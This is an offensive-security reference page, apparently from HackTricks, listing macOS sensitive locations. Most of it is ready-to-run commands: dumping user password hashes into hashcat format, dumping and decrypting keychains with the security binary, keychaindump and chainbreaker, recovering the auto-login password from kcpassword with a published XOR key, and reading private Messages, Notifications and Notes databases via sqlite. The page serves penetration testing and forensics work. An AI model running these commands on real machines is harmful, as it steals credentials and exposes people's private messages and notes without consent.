Links

macOS Sensitive Locations

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

Passwords

Shadow Passwords

Shadow password is stored with the user's configuration in plists located in /var/db/dslocal/nodes/Default/users/. The following oneliner can be use to dump all the information about the users (including hash info):
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
Scripts like this one or this one can be used to transform the hash to hashcat format.
An alternative one-liner which will dump creds of all non-service accounts in hashcat format -m 7100 (macOS PBKDF2-SHA512):
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'

Keychain Dump

Note that when using the security binary to dump the passwords decrypted, several prompts will ask the user to allow this operation.
#security
secuirty dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
Based on this comment juuso/keychaindump#10 (comment) it looks like these tools aren't working anymore in Big Sur.

Keychaindump Overview

A tool named keychaindump has been developed to extract passwords from macOS keychains, but it faces limitations on newer macOS versions like Big Sur, as indicated in a discussion. The use of keychaindump requires the attacker to gain access and escalate privileges to root. The tool exploits the fact that the keychain is unlocked by default upon user login for convenience, allowing applications to access it without requiring the user's password repeatedly. However, if a user opts to lock their keychain after each use, keychaindump becomes ineffective.
Keychaindump operates by targeting a specific process called securityd, described by Apple as a daemon for authorization and cryptographic operations, crucial for accessing the keychain. The extraction process involves identifying a Master Key derived from the user's login password. This key is essential for reading the keychain file. To locate the Master Key, keychaindump scans the memory heap of securityd using the vmmap command, looking for potential keys within areas flagged as MALLOC_TINY. The following command is used to inspect these memory locations:
sudo vmmap <securityd PID> | grep MALLOC_TINY
After identifying potential master keys, keychaindump searches through the heaps for a specific pattern (0x0000000000000018) that indicates a candidate for the master key. Further steps, including deobfuscation, are required to utilize this key, as outlined in keychaindump's source code. Analysts focusing on this area should note that the crucial data for decrypting the keychain is stored within the memory of the securityd process. An example command to run keychaindump is:
sudo ./keychaindump

chainbreaker

Chainbreaker can be used to extract the following types of information from an OSX keychain in a forensically sound manner:
  • Hashed Keychain password, suitable for cracking with hashcat or John the Ripper
  • Internet Passwords
  • Generic Passwords
  • Private Keys
  • Public Keys
  • X509 Certificates
  • Secure Notes
  • Appleshare Passwords
Given the keychain unlock password, a master key obtained using volafox or volatility, or an unlock file such as SystemKey, Chainbreaker will also provide plaintext passwords.
Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information.

Dump keychain keys

#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain

Dump keychain keys (with passwords) with SystemKey

# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) cracking the hash

# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) with memory dump

Follow these steps to perform a memory dump
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dump keychain keys (with passwords) using users password

If you know the users password you can use it to dump and decrypt keychains that belong to the user.
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db

kcpassword

The kcpassword file is a file that holds the user’s login password, but only if the system owner has enabled automatic login. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure).
The password is stored in the file /etc/kcpassword xored with the key 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F. If the users password is longer than the key, the key will be reused. This makes the password pretty easy to recover, for example using scripts like this one.

Interesting Information in Databases

Messages

sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'

Notifications

You can find the Notifications data in $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
Most of the interesting information is going to be in blob. So you will need to extract that content and transform it to human readable or use strings. To access it you can do:
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack

Notes

The users notes can be found in ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: